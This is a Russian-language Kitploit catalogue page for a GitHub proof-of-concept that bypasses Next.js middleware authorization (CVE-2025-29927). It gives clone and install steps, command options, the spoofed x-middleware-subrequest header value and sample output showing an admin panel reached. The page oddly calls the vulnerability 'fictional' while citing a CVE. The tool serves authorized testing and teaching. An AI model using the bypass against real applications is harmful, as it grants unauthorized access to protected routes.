Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Proof-of-Concept для вымышленного обхода middleware в Next.js (CVE-2025-29927) — формируйте подзапросы для тестирования защищённых маршрутов. | Kitploit
Инструменты/GitHubGitHub/m2hcz/poc-for-next.js-middleware
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Proof-of-Concept для вымышленного обхода middleware в Next.js (CVE-2025-29927) — формируйте подзапросы для тестирования защищённых маршрутов.

Репозиторий
1471 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для обхода middleware в Next.js (CVE-2025-29927)

Python Version Status

Это доказательство концепции для вымышленной уязвимости обхода middleware в Next.js (CVE-2025-29927). Используйте только в образовательных целях и санкционированных исследованиях безопасности.


🚀 Возможности

ВозможностьОписание
✨ Цвет и подробный выводЦветной вывод; -v для детальных отладочных журналов.
📦 ООП-структураПроектирование на основе классов для ясности и поддерживаемости.
🌐 Поддержка проксиНаправляйте трафик через HTTP(S)-прокси с помощью --proxy.
🍪 Работа с сессиямиПостоянный requests.Session для cookie и повторного использования соединения.
🚦 Контроль редиректовПо умолчанию не переходит по редиректам; чётко определяет успех или провал.
🛠 Настраиваемые заголовкиПереопределяйте User-Agent, x-middleware-subrequest или добавляйте заголовки.

⚡ Установка

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Требуется Python 3.7+


🎯 Использование

root@kitploit:~
python poc.py [options] <host>[:port]
ОпцияОписание
-p, --path PATHПуть к защищённому маршруту (по умолчанию: /admin)
-s, --scheme {http,https}Протокол (по умолчанию: http)
--header HEADERЗначение заголовка x-middleware-subrequest (по умолчанию: middleware:middleware)
-ua, --user-agent AGENTПользовательский User-Agent (по умолчанию: Mozilla/5.0)
--proxy PROXYURL HTTP(S)-прокси (например, http://127.0.0.1:8080)
-v, --verboseВключить отладочный вывод
-h, --helpПоказать это справочное сообщение

🔍 Примеры

1. Базовый тест

root@kitploit:~
python poc.py localhost:3000

2. HTTPS и пользовательский путь

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Прокси и подробный вывод

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Ожидаемый результат

Успех

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Провал

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
Скачать инструмент